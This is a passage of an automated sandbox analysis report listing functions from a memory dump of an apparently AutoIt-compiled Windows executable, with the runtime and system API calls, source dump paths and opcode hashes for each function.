_free.LIBCMT ref: 002B971C

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 054f0e78a23ec8a5fe8dfe8a0e9002e7cdb4f2f3449484dda65fdb6d8432d175
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: 03514FB1914218ABDF249F64CC85AEEBBB9EF48304F10449EF60DA3241DB715A95CF58

Function 0027470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002747A0
__flush.LIBCMT ref: 002747C0
__write.LIBCMT ref: 002747F3
__flsbuf.LIBCMT ref: 00274821

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction ID: 923f77ffb82aef8f069fa0ab8e4ab8b87688ef1235873bb1ea986acc6401e8f4
Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
Instruction Fuzzy Hash: 8241D675A2074A9BDB1CEE69CC809AEB7A6EF46364B24C13DE81DCB640D770DD608B41

Function 002544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002544CF

Part of subcall function 0025407C: _memset.LIBCMT ref: 002540FC
Part of subcall function 0025407C: _wcscpy.LIBCMT ref: 00254150
Part of subcall function 0025407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160

KillTimer.USER32(?,00000001,?,?), ref: 00254524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00254533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0028D4B9

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
Instruction ID: d36db5b074e9706a8aa8267b9a90040c82c14a4068879dce4ba5ad092f43fee6
Opcode Fuzzy Hash: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
Instruction Fuzzy Hash: AD213774815384AFE732AF249849BE6FBECAF15309F04008EEB8E561C1C3B0299CCB45

Function 00254C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00254CBA

Strings

AU3!P/., xrefs: 00254CB4
EA06, xrefs: 0028D8CC

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/.$EA06
API String ID: 4104443479-1743673582
Opcode ID: ce01907e610030084080768e8dd87dca4ce25e7bdfb2ec8e0de90baba6afda28
Instruction ID: c8be5ee5b80065777e8d951a42874285cd7cb98094ef0326134b333dd9582b1f
Opcode Fuzzy Hash: ce01907e610030084080768e8dd87dca4ce25e7bdfb2ec8e0de90baba6afda28
Instruction Fuzzy Hash: 65416C31A3515857CF22BF5488527BEFBB19B4530AF284075EC82DB282D6709DFC87A5

Function 00257285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0028EA39
GetOpenFileNameW.COMDLG32(?), ref: 0028EA83

Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770

Part of subcall function 00270791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002707B0

Strings

X, xrefs: 0028EA51

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
Instruction ID: 811cc952846fcf6004091ba92db741e5fb62727ae162e0169f7f7a56d757d541
Opcode Fuzzy Hash: 2b52382578a5e9033325b859d4c19e50774536a03b10574efe01252599f12cc2
Instruction Fuzzy Hash: C821F634A202489BCF019F94D845BEE7BFCAF48705F00805AE848E7281DBF4599D8F91

Function 002B8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002B8DAC
__fread_nolock.LIBCMT ref: 002B8DC1

Strings

EA06, xrefs: 002B8DF3

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 62808e00abac5cf3f2f3a645420aa5d9b750de59ce5303402efa54c5a01584d9
Instruction ID: 5b1071d64dfab84c8549a9d54578468e0fce9d2931b4b02a9772ce55e6cde98f
Opcode Fuzzy Hash: 62808e00abac5cf3f2f3a645420aa5d9b750de59ce5303402efa54c5a01584d9
Instruction Fuzzy Hash: C401F9718142187EDB18CBA8C856EEEBBFCDB15301F00419FF596D2181E9B5A6188B60

Function 002B98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 002B98F8
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 002B990F

Strings

aut, xrefs: 002B9909

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
Instruction ID: 0b4aeef3e9fa092b0018848cf7f3a5df1e7efd20dbf3f8661a10b3da940d26ec
Opcode Fuzzy Hash: 4199358d12c4d75988c243e3632e97c7f19d15cbd72a93ee2e3d20fa9bc2e783
Instruction Fuzzy Hash: 7ED05B7594130D6BDB509B90EC0DFD6773CD704700F0042B1BE5591191D97099548B95

Function 002CCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
Instruction ID: de0c0278519ec08e81b64168abd67ea12670dfc4bbd12993ab4facbc38724517
Opcode Fuzzy Hash: c3bafc8feb560d52a3445876f9bd406f00d651ff837b2e2dc124034696f3ba74
Instruction Fuzzy Hash: 68F14A71A183019FC714DF28C484A6ABBE5FF89314F24892EF8999B351D770E955CF82

Function 0025434A Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00254370
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00254415
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00254432

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
Instruction ID: ee74fd1d4882ac936ef7d404c39f8b60e9f6492a31c3276b2b4059278c2381c8
Opcode Fuzzy Hash: 1648b3aa05d9b8fe6075940da31d10653e6244c943ff131883984fc61f29faa5
Instruction Fuzzy Hash: D331C371515701DFC721EF24D88469BFBF8FB48309F004D2EEA8A83251D771A998CB56

Function 0027571C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00275733

Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A192
Part of subcall function 0027A16B: __NMSG_WRITE.LIBCMT ref: 0027A19C

__NMSG_WRITE.LIBCMT ref: 0027573A

Part of subcall function 0027A1C8: GetModuleFileNameW.KERNEL32(00000000,003133BA,00000104,?,00000001,00000000), ref: 0027A25A
Part of subcall function 0027A1C8: ___crtMessageBoxW.LIBCMT ref: 0027A308

Part of subcall function 0027309F: ___crtCorExitProcess.LIBCMT ref: 002730A5
Part of subcall function 0027309F: ExitProcess.KERNEL32 ref: 002730AE

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

RtlAllocateHeap.NTDLL(013D0000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 3b97fcfefa2080c5f60c175d155ba0b6d88745ddba6d738d565783586ddd4bb7
Instruction ID: 462ec996f7d2adf0decc8d246877c1d5346127eb0e326b996b611c8675ec34b1
Opcode Fuzzy Hash: 3b97fcfefa2080c5f60c175d155ba0b6d88745ddba6d738d565783586ddd4bb7
Instruction Fuzzy Hash: DE01F531270B22DEE6197B38EC46A6EF3488B82362F10C425F40DEB181DFF09C209A65

Function 002B98A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002B9548,?,?,?,?,?,00000004), ref: 002B98BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002B98D1
CloseHandle.KERNEL32(00000000,?,002B9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002B98D8

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
Instruction ID: 2c7811bc7a1a5347d4f6cace989e463c8449113e6f93e1d982aa07478fb72b4a
Opcode Fuzzy Hash: 2790719ba6c59ba4e18e7ea8d3e19e69d6b7c76a02bdce0bf6f96d517e6fc632
Instruction Fuzzy Hash: B4E08632541224B7D7611F54FD0DFCA7F19AF06760F114121FB15690E087B15A21979C

Function 002B8D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 002B8D1B

Part of subcall function 00272D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00279A24), ref: 00272D69
Part of subcall function 00272D55: GetLastError.KERNEL32(00000000,?,00279A24), ref: 00272D7B

_free.LIBCMT ref: 002B8D2C
_free.LIBCMT ref: 002B8D3E

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 58b7c4b593ddf60cda10d53df739c5247f5e3e46c9c161d87838ebb69861a652
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 3CE012B162161386CB34A979A940AD313DC4F58392718491EF44DD7186CE74F866C524

Function 0025A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0028FC01

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8fc371b05d568ffc2312453e35258ab189525577c9e100eea1a2025fd8c849a3
Instruction ID: 6add96563627af9adb3854dd8c40c5314fd9355f8601e1bfcb8d80b901b979bd
Opcode Fuzzy Hash: 8fc371b05d568ffc2312453e35258ab189525577c9e100eea1a2025fd8c849a3
Instruction Fuzzy Hash: 78227A74528301CFCB25DF14C495A6AB7E1BF48305F14896DE88A8B361D771ECA9CF86

Function 00257A51 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00257AAB
_memmove.LIBCMT ref: 00257B16

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction ID: 75782250cf6d574bcc4ee8ae0824563359f448ad76f55b9637892f559fb6c5ef
Opcode Fuzzy Hash: 40fbce4a1fea4cfe3bf1a015a5a2827c9472d34ae18aa590b79f6fb0e3b65f37
Instruction Fuzzy Hash: E631C2B1624606AFC704DF68D8D1E69B3A9FF483207158629F819CB291EB70E934CB94

Function 002547D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00254834

Part of subcall function 0027336C: __lock.LIBCMT ref: 00273372
Part of subcall function 0027336C: DecodePointer.KERNEL32(00000001,?,00254849,002A7C74), ref: 0027337E
Part of subcall function 0027336C: EncodePointer.KERNEL32(?,?,00254849,002A7C74), ref: 00273389

Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00254915
Part of subcall function 002548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0025492A

Part of subcall function 00253B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00253B68
Part of subcall function 00253B3A: IsDebuggerPresent.KERNEL32 ref: 00253B7A
Part of subcall function 00253B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,003152F8,003152E0,?,?), ref: 00253BEB
Part of subcall function 00253B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00253C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00254874

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 44340e4a7215f50e75fae0cf4dea1ff6052cd9c0ff85b8fe7a78f86d7c2723bd
Instruction ID: 34e22e2db0fe8031268c093c91faea61aeaed94eca75373ceb9bc4d087bc5d74
Opcode Fuzzy Hash: 44340e4a7215f50e75fae0cf4dea1ff6052cd9c0ff85b8fe7a78f86d7c2723bd
Instruction Fuzzy Hash: 5411C071924301DBD701EF69EC0994AFBE8EF99750F00891EF44587271DBB08559CF85

Function 00270DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F

std::exception::exception.LIBCMT ref: 00270DEC
__CxxThrowException@8.LIBCMT ref: 00270E01

Part of subcall function 0027859B: RaiseException.KERNEL32(?,?,?,00309E78,00000000,?,?,?,?,00270E06,?,00309E78,?,00000001), ref: 002785F0

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 4a8f41e57cc257fed0c3a8986334ea3049a0505273fcc349e1e59ac14c58d98f
Instruction ID: b9cd0f055b7ee926c9be536df02c759108747363d1b67a81db110a9e8b8f2a69
Opcode Fuzzy Hash: 4a8f41e57cc257fed0c3a8986334ea3049a0505273fcc349e1e59ac14c58d98f
Instruction Fuzzy Hash: 10F0F43146031EE6CB20AAA5EC559DFB7ACDF05310F008426F90CA6181DFF09AB8CAD1

Function 002755FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027562C
__lock_file.LIBCMT ref: 0027564D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: df2f83b07d4f2b580aeec9de0caead3c9fa43381b456b7514c016bedae205448
Instruction ID: 97ec3ccc538fd08bdaf11393108995c35b83f7d5ade32e601af55badec3118c2
Opcode Fuzzy Hash: df2f83b07d4f2b580aeec9de0caead3c9fa43381b456b7514c016bedae205448
Instruction Fuzzy Hash: 4F01F771C20A19EBCF22AF649C0649FBB65AF50321F40C115F82C5A191DBB18A31DF91

Function 002753A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00278B28: __getptd_noexit.LIBCMT ref: 00278B28

__lock_file.LIBCMT ref: 002753EB

Part of subcall function 00276C11: __lock.LIBCMT ref: 00276C34

__fclose_nolock.LIBCMT ref: 002753F6

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 5180d652361b3cd958197e8ffd8e03be571e4319a4e0ffa88acb8b4b17c6826c
Instruction ID: a01253b222738a62ffc7a0b588466017460a087cab97d83382ed0f8e971e2793
